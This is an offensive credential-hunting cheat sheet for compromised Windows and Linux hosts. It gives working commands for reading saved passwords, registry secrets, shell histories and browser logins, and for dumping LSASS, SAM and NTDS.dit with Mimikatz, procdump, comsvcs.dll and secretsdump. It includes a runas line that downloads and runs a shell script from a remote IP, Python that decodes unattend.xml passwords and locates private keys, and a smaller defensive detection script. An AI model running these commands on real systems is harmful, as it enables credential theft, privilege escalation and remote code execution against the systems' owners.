Credential Hunting

Search for and extract credentials from compromised Windows and Linux systems to escalate privileges and move laterally.
This phase usually follows an initial foothold or privilege escalation and focuses on discovering stored passwords, hashes, keys and tokens; anything recovered is fed back into privilege escalation and lateral movement.

Windows Credential Hunting

Quick Wins

Search for Password Keywords

# Search file contents for passwords (a recursive search of C:\ is slow and noisy; narrow -Path to user profiles, web roots or C:\inetpub first)
Get-ChildItem -Path C:\ -Recurse -File -Include *.txt,*.xml,*.config,*.ini,*.json,*.yaml,*.yml -ErrorAction SilentlyContinue -Force | Select-String -Pattern "password|pass|passwd|pwd" -ErrorAction SilentlyContinue | Select-Object Path, LineNumber

# Search for specific keyword
Get-ChildItem -Path C:\ -Recurse -File -ErrorAction SilentlyContinue -Force | Select-String -Pattern "password" -ErrorAction SilentlyContinue | Select-Object Path, LineNumber, Line

# Search in filenames
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue -Force | Where-Object { $_.Name -like "*password*" }

CMD Search Commands

# Search file contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul
findstr /spin "password" *.*

# Search for specific filenames
dir /S /B *pass*.txt *pass*.xml *pass*.ini *cred* *vnc* *.config*
where /R C:\ user.txt
where /R C:\ *.ini

Registry Credential Hunting

Autologon Credentials

# Check for autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

Search Registry for Passwords

# Search key names, value names and data under each hive for "password" (slow; /t REG_SZ limits hits to string values)
reg query HKLM /f "password" /t REG_SZ /s
reg query HKCU /f "password" /t REG_SZ /s

# Common credential locations
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

PuTTY Saved Sessions

# List PuTTY sessions
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

# Query a specific session: PuTTY stores HostName, UserName, PublicKeyFile (path to the .ppk) and any ProxyPassword in plaintext, not the SSH login password
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<session_name>

PowerShell History

Get History File Location

(Get-PSReadLineOption).HistorySavePath

Read PowerShell History

# Current user
gc (Get-PSReadLineOption).HistorySavePath

# All users
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Saved Credentials

cmdkey - List Saved Credentials

# List stored credentials
cmdkey /list

# Use saved credentials
runas /savecred /user:DOMAIN\admin cmd.exe
runas /savecred /user:DOMAIN\admin "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/shell.ps1')"

Windows Credential Manager

View Credential Manager

# Open Credential Manager GUI
rundll32 keymgr.dll,KRShowKeyMgr

# List credentials
cmdkey /list

Dump Credentials with Mimikatz

mimikatz.exe
privilege::debug
sekurlsa::credman

Application Credentials

LaZagne - Extract All Credentials

# Run all modules
.\lazagne.exe all

# Specific modules
.\lazagne.exe browsers
.\lazagne.exe wifi
.\lazagne.exe databases

SessionGopher - Extract Saved Sessions

# Import module
Import-Module .\SessionGopher.ps1

# Run locally
Invoke-SessionGopher

# Run against remote target
Invoke-SessionGopher -Target COMPUTER01

SharpChrome - Extract Chrome Credentials

# Extract saved logins
.\SharpChrome.exe logins /unprotect

# Extract cookies
.\SharpChrome.exe cookies

Unattended Installation Files

# Search for unattend.xml / sysprep answer files
Get-ChildItem -Path C:\ -Recurse -Include *unattend*.xml,sysprep.xml,sysprep.inf -ErrorAction SilentlyContinue

# Common locations
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\System32\Sysprep\Unattend.xml
C:\Windows\System32\Sysprep\sysprep.xml
C:\Windows\System32\Sysprep\sysprep.inf

# Password values are either plaintext (<PlainText>true</PlainText>) or base64 of the UTF-16LE string
# "<password>Password" ("<password>AdministratorPassword" for the built-in Administrator); strip the suffix after decoding
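The decoding step above, as an added Python example that is not part of the original page: it walks an unattend.xml, handles both plaintext and obfuscated values, strips the element-name suffix Windows Setup appends, and pairs each password with the account it belongs to. The answer file, account names and passwords in build_sample_unattend() are constructed for this example; the encode_unattend_password() helper exists only to build that sample.

```python
import base64
import xml.etree.ElementTree as ET

UNATTEND_NS = "urn:schemas-microsoft-com:unattend"


def _local(tag):
    """Strip the XML namespace prefix ("{urn:...}Password" -> "Password")."""
    return tag.rsplit("}", 1)[-1]


def encode_unattend_password(password, element_name="Password"):
    """Windows Setup's obfuscation: base64 of UTF-16LE(password + element name).
    Used here only to build the constructed sample below."""
    return base64.b64encode((password + element_name).encode("utf-16-le")).decode("ascii")


def decode_unattend_value(value, element_name="Password"):
    """Reverse the obfuscation. Returns the decoded text unchanged when the
    expected suffix is missing (some deployment tooling omits it)."""
    text = base64.b64decode(value).decode("utf-16-le")
    if text.endswith(element_name):
        return text[: -len(element_name)]
    return text


def extract_unattend_passwords(xml_text):
    """Return (parent element, account, password) for every Password /
    AdministratorPassword element in an answer file, decoding obfuscated values."""
    root = ET.fromstring(xml_text)
    found = []
    for parent in root.iter():
        for child in parent:
            name = _local(child.tag)
            if name not in ("Password", "AdministratorPassword"):
                continue
            value_el = next((c for c in child if _local(c.tag) == "Value"), None)
            plain_el = next((c for c in child if _local(c.tag) == "PlainText"), None)
            if value_el is None or not value_el.text:
                continue
            value = value_el.text.strip()
            is_plain = plain_el is not None and (plain_el.text or "").strip().lower() == "true"
            password = value if is_plain else decode_unattend_value(value, name)
            if name == "AdministratorPassword":
                account = "Administrator"
            else:
                # AutoLogon carries <Username>, LocalAccount carries <Name>
                account = next((c.text for c in parent if _local(c.tag) in ("Username", "Name")), None)
            found.append((_local(parent.tag), account, password))
    return found


def build_sample_unattend():
    """Constructed answer file (made-up accounts and passwords) in the layout Windows Setup writes."""
    autologon = encode_unattend_password("Deploy2024!", "Password")
    admin = encode_unattend_password("Adm1nS3cret", "AdministratorPassword")
    return f"""<unattend xmlns="{UNATTEND_NS}">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>{autologon}</Value><PlainText>false</PlainText></Password>
        <Enabled>true</Enabled>
        <Username>svc_deploy</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword><Value>{admin}</Value><PlainText>false</PlainText></AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Password><Value>Winter2024!</Value><PlainText>true</PlainText></Password>
            <Name>localadmin</Name>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""


if __name__ == "__main__":
    # On a target: extract_unattend_passwords(open(r"C:\Windows\Panther\Unattend.xml", encoding="utf-8").read())
    for parent, account, password in extract_unattend_passwords(build_sample_unattend()):
        print(f"{parent:15} {account!s:15} {password}")
```

The namespace is stripped with _local() because Windows answer files declare a default namespace, so naive tag comparisons against "Password" would silently match nothing.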

Sticky Notes

# Sticky Notes database location
C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

# Query with PSSQLite
Import-Module .\PSSQLite.psd1
$db = 'C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap
# Offline, with strings (the -wal file can hold recent notes not yet checkpointed into plum.sqlite)
strings plum.sqlite plum.sqlite-wal | grep -i password

KeePass Databases

# Find KeePass databases
Get-ChildItem -Path C:\ -Recurse -Include *.kdbx -ErrorAction SilentlyContinue

# Extract hash (keepass2john ships with John the Ripper; the python2.7 keepass2john.py script is the older standalone version)
keepass2john database.kdbx > keepass_hash.txt

# Crack hash (hashcat -m 13400 covers KeePass 1.x and KDBX 2/3 AES databases, not KDBX 4 with Argon2,
# and expects the hash without the leading "database:" filename prefix that keepass2john writes)
hashcat -m 13400 keepass_hash.txt rockyou.txt
john --wordlist=rockyou.txt keepass_hash.txt

WiFi Passwords

# List saved WiFi networks
netsh wlan show profile

# Extract WiFi password
netsh wlan show profile <SSID> key=clear

Installed Applications

# List installed applications
dir "C:\Program Files"
dir "C:\Program Files (x86)"
# PowerShell method
$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize

Chrome Dictionary Files

# Check Chrome custom dictionary
gc 'C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt'

PowerShell Encrypted Credentials

# If you find exported PSCredential files (Export-Clixml): the SecureString inside is DPAPI-protected,
# so this only decrypts when run as the user that exported it, on the same machine
$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
$credential.GetNetworkCredential().username
$credential.GetNetworkCredential().password

Snaffler - Network Share Hunting

# Search network shares for sensitive files
.\Snaffler.exe -s -o snaffler.log

# Search specific share
.\Snaffler.exe -s -d DOMAIN -c <DC> -o results.log

Linux Credential Hunting

Quick Wins

Search for Passwords in Files

# Search for password patterns
grep -R --line-number -i "pass\|pwd\|secret\|token" /etc /home 2>/dev/null

# Search in config files
find / -type f -name "*.conf" -exec grep -H "pass" {} \; 2>/dev/null
find / -type f -name "*.config" -exec grep -H "pass" {} \; 2>/dev/null

# Search in scripts
find / -type f -name "*.sh" -exec grep -H "pass" {} \; 2>/dev/null

# Search for backup files
find / -type f \( -name "*.bak" -o -name "*.backup" -o -name "*.old" \) 2>/dev/null

History Files

# Find history files
find / -type f \( -name "*_history" -o -name ".bash_history" -o -name ".zsh_history" \) 2>/dev/null

# Read history files
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.python_history
cat ~/.php_history

SSH Keys

# Find SSH private keys by name (keys that were renamed or copied into backups need a content search for "PRIVATE KEY" instead)
find / \( -name "id_rsa" -o -name "id_dsa" -o -name "id_ecdsa" -o -name "id_ed25519" -o -name "*.pem" -o -name "*.ppk" \) 2>/dev/null

# Check permissions
ls -la ~/.ssh/
ls -la /home/*/.ssh/
ls -la /root/.ssh/

# Find authorized_keys
find / -name "authorized_keys" 2>/dev/null
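The find commands above only catch keys with conventional names. As an added Python example (not code from the original page), the finder below identifies private keys by content, reports the format, whether the key is passphrase-protected (so you know whether it is usable as-is or needs cracking) and whether its mode lets group/others read it, and runs over a constructed sample tree. The OpenSSH v1 check decodes the first base64 line and reads the cipher name from the "openssh-key-v1" header; "none" means unencrypted. All paths and key bodies in build_sample_tree() are made up and are not usable keys.

```python
import base64
import os
import stat
import struct
import tempfile
from pathlib import Path

MAX_KEY_BYTES = 1 << 20  # private keys are small; skip anything larger


def classify_private_key(data):
    """Return (format, encrypted) for the head of a file, or None if it is not a private key.
    Covers OpenSSH v1, legacy PEM (RSA/DSA/EC), PKCS#8 and PuTTY .ppk."""
    if data.startswith(b"PuTTY-User-Key-File-"):
        return "putty-ppk", b"Encryption: none" not in data
    if b"-----BEGIN OPENSSH PRIVATE KEY-----" in data:
        lines = data.split(b"-----BEGIN OPENSSH PRIVATE KEY-----", 1)[1].strip().splitlines()
        first = lines[0].strip() if lines else b""
        try:
            blob = base64.b64decode(first + b"=" * (-len(first) % 4))
        except ValueError:
            return "openssh-v1", True  # unreadable header; assume the worst
        # layout: magic "openssh-key-v1\0", then uint32 length + cipher name
        magic = b"openssh-key-v1\x00"
        if blob.startswith(magic) and len(blob) >= len(magic) + 4:
            (n,) = struct.unpack(">I", blob[len(magic):len(magic) + 4])
            cipher = blob[len(magic) + 4:len(magic) + 4 + n]
            return "openssh-v1", cipher != b"none"
        return "openssh-v1", True
    if b"-----BEGIN ENCRYPTED PRIVATE KEY-----" in data:
        return "pkcs8", True
    if b"-----BEGIN PRIVATE KEY-----" in data:
        return "pkcs8", False
    for algo in (b"RSA", b"DSA", b"EC"):
        if b"-----BEGIN " + algo + b" PRIVATE KEY-----" in data:
            return "pem-" + algo.decode().lower(), b"Proc-Type: 4,ENCRYPTED" in data
    return None


def find_private_keys(root):
    """Walk a tree and report private keys by content, with encryption state and permissions."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode) or st.st_size > MAX_KEY_BYTES:
                    continue
                with open(path, "rb") as fh:
                    head = fh.read(4096)
            except OSError:
                continue
            info = classify_private_key(head)
            if info is None:
                continue
            fmt, encrypted = info
            mode = stat.S_IMODE(st.st_mode)
            found.append({"path": path, "format": fmt, "encrypted": encrypted,
                          "mode": oct(mode), "loose_perms": bool(mode & 0o077)})
    return found


def _fake_openssh_v1(cipher):
    """Constructed openssh-key-v1 header with a dummy body; not a usable key."""
    blob = b"openssh-key-v1\x00" + struct.pack(">I", len(cipher)) + cipher + b"\x00" * 24
    return b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob) + b"\n-----END OPENSSH PRIVATE KEY-----\n"


def build_sample_tree():
    """Constructed home directories with made-up key material."""
    root = tempfile.mkdtemp(prefix="sshhunt_")
    samples = {
        "home/alice/.ssh/id_ed25519": (_fake_openssh_v1(b"none"), 0o600),
        "home/alice/.ssh/id_ed25519.pub": (b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLE alice@host\n", 0o644),
        "home/bob/backup/deploy.key": (_fake_openssh_v1(b"aes256-ctr"), 0o644),
        "home/bob/old.pem": (b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                             b"DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                             b"MIIEpAIBAAKCAQEAdummy\n-----END RSA PRIVATE KEY-----\n", 0o644),
        "opt/putty/jump.ppk": (b"PuTTY-User-Key-File-3: ssh-ed25519\nEncryption: none\nComment: jump\n", 0o644),
        "home/bob/notes.txt": (b"remember to rotate the deploy key\n", 0o644),
    }
    for rel, (content, mode) in samples.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(content)
        os.chmod(p, mode)
    return root


if __name__ == "__main__":
    # On a target: find_private_keys("/home"), find_private_keys("/root"), find_private_keys("/opt")
    for key in find_private_keys(build_sample_tree()):
        print(f"{key['path']}  {key['format']}  encrypted={key['encrypted']}  mode={key['mode']}  loose={key['loose_perms']}")
```

A key reported with loose_perms=True is readable by more than its owner, which is both a finding in itself and a sign the file may have been copied around; an encrypted key still needs its passphrase (ssh2john / hashcat mode 22911 for OpenSSH v1 keys) before it is useful.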

Database Credentials

# Common database config locations
cat /var/www/html/config.php
cat /var/www/html/wp-config.php
cat /etc/mysql/my.cnf
cat ~/.my.cnf
cat ~/.pgpass

Environment Variables

# Check environment for secrets
env | sort
printenv
cat /proc/*/environ 2>/dev/null | tr '\0' '\n'

Configuration Files

# Search common config locations
cat /etc/passwd
cat /etc/shadow
cat /etc/group
cat /etc/sudoers
cat /etc/ssh/sshd_config

# Application configs
find /etc -type f -name "*.conf" 2>/dev/null
find /opt -type f -name "*.conf" 2>/dev/null

Log Files

# Search logs for credentials
grep -r "password" /var/log 2>/dev/null
grep -r "pass" /var/log 2>/dev/null

# Check auth logs
cat /var/log/auth.log
cat /var/log/secure

Web Application Files

# Search web directories
find /var/www -type f -name "*.php" -exec grep -H "password" {} \; 2>/dev/null
find /var/www -type f -name "*.config" -exec grep -H "password" {} \; 2>/dev/null

# Common web app configs
cat /var/www/html/wp-config.php
cat /var/www/html/configuration.php
cat /var/www/html/config.inc.php

Backup Files

# Find backup files
find / -name "*.bak" -o -name "*.backup" -o -name "*.old" -o -name "*~" 2>/dev/null

# Check backup directories
ls -la /var/backups/
ls -la /tmp/
ls -la /opt/backups/

Memory Dumps

# Check for core dumps
find / -name "core" -o -name "*.core" 2>/dev/null

# Strings on memory dumps
strings /path/to/core | grep -i password

LSASS Dumping (Windows)

Task Manager Method

1. Open Task Manager
2. Find "Local Security Authority Process"
3. Right-click -> Create dump file
4. Copy dump file to attacker machine

ProcDump

# Dump LSASS
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Transfer and parse with Mimikatz
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Mimikatz Direct

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

Rundll32 Method

# Find LSASS PID
tasklist /fi "imagename eq lsass.exe"

# Create dump via the comsvcs.dll MiniDump export (needs an elevated shell with SeDebugPrivilege; fails when LSASS runs as PPL)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <lsass_pid> C:\temp\lsass.dmp full

SAM/SYSTEM Dumping (Windows)

Registry Method

# Save registry hives
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SECURITY C:\temp\SECURITY

# Extract hashes offline
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

Volume Shadow Copy

# Create shadow copy
wmic shadowcopy call create Volume='C:\'

# List shadow copies
vssadmin list shadows

# Copy SAM/SYSTEM from the shadow copy (use the "Shadow Copy Volume" path printed by vssadmin; the HarddiskVolumeShadowCopyN index varies)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM

NTDS.dit Dumping (Domain Controller)

NTDSUtil Method

# Create IFM backup (writes C:\temp\ntds\Active Directory\ntds.dit and C:\temp\ntds\registry\SYSTEM)
ntdsutil "ac i ntds" "ifm" "create full C:\temp\ntds" q q

# Extract hashes offline from the copied files
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

Volume Shadow Copy Method

# Create shadow copy
vssadmin create shadow /for=C:

# Copy NTDS.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM C:\temp\SYSTEM

CrackMapExec / NetExec

# Dump NTDS remotely (replicates hashes over DRSUAPI by default, so it needs an account with replication rights, e.g. Domain Admin;
# NetExec, the maintained fork, keeps the same syntax as nxc)
crackmapexec smb 10.10.10.10 -u administrator -p password --ntds

Notes

Windows Credential Locations:

  • Registry (Autologon, PuTTY, VNC)
  • PowerShell history
  • Credential Manager
  • Application configs (browsers, email, FTP)
  • Unattended installation files
  • Sticky Notes database
  • KeePass databases
  • WiFi profiles

Linux Credential Locations:

  • History files (.bash_history, .mysql_history)
  • SSH keys (id_rsa, authorized_keys)
  • Configuration files (/etc, /opt, /var/www)
  • Environment variables
  • Database configs
  • Log files
  • Backup files

DPAPI (Data Protection API):

  • Windows uses DPAPI to encrypt saved credentials (Credential Manager, browser logins, exported PSCredentials)
  • User-scope blobs decrypt with the user's master key, which is derived from the user's password (or NTLM hash); for domain users the domain DPAPI backup key held by the DCs can decrypt any user's master key
  • Machine-scope blobs decrypt only on the same machine (as SYSTEM)
  • Mimikatz (dpapi::* modules) can decrypt blobs given the master key, the user's password/hash, or the domain backup key
  • SharpDPAPI and DonPAPI are alternative tools

LSASS Dumping:

  • Requires local admin (SeDebugPrivilege) or SYSTEM; fails when LSASS runs as a protected process (RunAsPPL) or Credential Guard isolates the secrets
  • Highly monitored by EDR/AV (handle opens on lsass.exe, e.g. Sysmon event 10)
  • Multiple methods available (procdump, task manager, rundll32 comsvcs.dll)
  • Parse dumps offline with Mimikatz (sekurlsa::minidump) or pypykatz

SAM/SYSTEM Hives:

  • SAM contains local user password hashes; SYSTEM holds the boot key needed to decrypt them; SECURITY holds LSA secrets and cached domain credentials
  • Hive files are locked while the system is running, so export them with reg save or copy them from a Volume Shadow Copy
  • Extract hashes with secretsdump.py or Mimikatz (lsadump::sam)

NTDS.dit:

  • Active Directory database on Domain Controllers
  • Contains all domain user hashes (needs the SYSTEM hive from the same DC for the boot key)
  • Requires Domain Admin, DC compromise, or replication rights (DCSync via secretsdump.py or CrackMapExec --ntds)
  • Extract with ntdsutil, VSS, or CrackMapExec

Detection Considerations:

  • LSASS handle access triggers alerts (Sysmon event 10 ProcessAccess on lsass.exe, EDR hooks on MiniDumpWriteDump)
  • Registry queries may be logged when object access auditing is enabled on the keys (events 4656/4663)
  • Recursive file searches generate noise (disk I/O, file-access telemetry)
  • Use living-off-the-land techniques when possible
  • Credential Manager reads can log event 5379 (Credential Manager credentials were read) when the relevant audit subcategory is enabled; process creation auditing (event 4688 or Sysmon event 1) records the commands themselves
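To make the LSASS and process-creation points concrete from the defender's side, here is an added Python example (not code from the original page) that runs two detection rules over constructed Sysmon-style event 10 (ProcessAccess) and event 4688 (process creation) log lines: the first flags handles opened on lsass.exe with the access masks credential dumpers request, suppressing a short allow-list of system processes; the second flags command lines carrying the comsvcs.dll MiniDump / procdump / sekurlsa indicators used earlier on this page. The log format, the allow-list and the mask list are assumptions for this example and must be tuned per environment.

```python
import re

# Access masks credential-dumping tools typically request on lsass.exe (assumed list,
# modelled on common Sysmon/Sigma rules; 0x1010 = mimikatz-style read, 0x1fffff = full access).
SUSPICIOUS_MASKS = {0x1010, 0x1410, 0x1418, 0x1438, 0x143a,
                    0x1f0fff, 0x1f1fff, 0x1f2fff, 0x1f3fff, 0x1fffff}
# System processes that legitimately open LSASS on most hosts (assumed; tune per environment).
BENIGN_SOURCES = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe",
                  r"c:\windows\system32\wbem\wmiprvse.exe"}
DUMP_CMD_RE = re.compile(r"(?i)(comsvcs\.dll,\s*minidump|procdump|sekurlsa|lsass\.dmp|-ma\s+lsass)")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Parse one key=value log line (quoted values may contain spaces) into a dict."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def lsass_access_alert(ev):
    """Rule 1: Sysmon event 10 handle open on lsass.exe with a dumper-like access mask."""
    if ev.get("EventID") != "10":
        return None
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    source = ev.get("SourceImage", "")
    if source.lower() in BENIGN_SOURCES:
        return None
    try:
        mask = int(ev.get("GrantedAccess", "0"), 16)
    except ValueError:
        return None
    if mask in SUSPICIOUS_MASKS:
        return f"lsass ProcessAccess {ev['GrantedAccess']} from {source}"
    return None


def dump_commandline_alert(ev):
    """Rule 2: process creation (4688) whose command line carries LSASS dump indicators."""
    if ev.get("EventID") != "4688":
        return None
    cmd = ev.get("CommandLine", "")
    if DUMP_CMD_RE.search(cmd):
        return f"process creation with LSASS dump indicators: {cmd}"
    return None


def detect(lines):
    """Run both rules over raw log lines and return the alert reasons in order."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        for rule in (lsass_access_alert, dump_commandline_alert):
            reason = rule(ev)
            if reason:
                alerts.append(reason)
    return alerts


# Constructed sample events (paths, PIDs and call traces are made up).
SAMPLE_EVENTS = [
    r"EventID=10 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1000",
    r"EventID=10 SourceImage=C:\Windows\System32\csrss.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1fffff",
    r"EventID=10 SourceImage=C:\Users\jdoe\Downloads\procdump.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1fffff",
    r'EventID=10 SourceImage=C:\Windows\System32\rundll32.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1fffff CallTrace="C:\Windows\SYSTEM32\ntdll.dll+9d4b4|C:\Windows\System32\comsvcs.dll+2a6a5"',
    r"EventID=10 SourceImage=C:\Temp\mimi.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1010",
    r"EventID=10 SourceImage=C:\Temp\mimi.exe TargetImage=C:\Windows\System32\notepad.exe GrantedAccess=0x1fffff",
    r'EventID=4688 NewProcessName=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\temp\lsass.dmp full"',
    r'EventID=4688 NewProcessName=C:\Windows\System32\cmd.exe CommandLine="cmd.exe /c whoami"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

The svchost.exe line is not flagged because 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) is routine, and csrss.exe is suppressed by the allow-list even with full access; an attacker who can rename a dumper to one of those paths defeats the allow-list, which is why the 4688 command-line rule runs independently.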

Best Practices:

  • Always check PowerShell history first
  • Search for unattend.xml / sysprep answer files
  • Check for saved credentials (cmdkey)
  • Look for KeePass databases
  • Search network shares with Snaffler
  • Check application-specific credential stores
  • Don’t forget WiFi passwords
  • Review Sticky Notes for passwords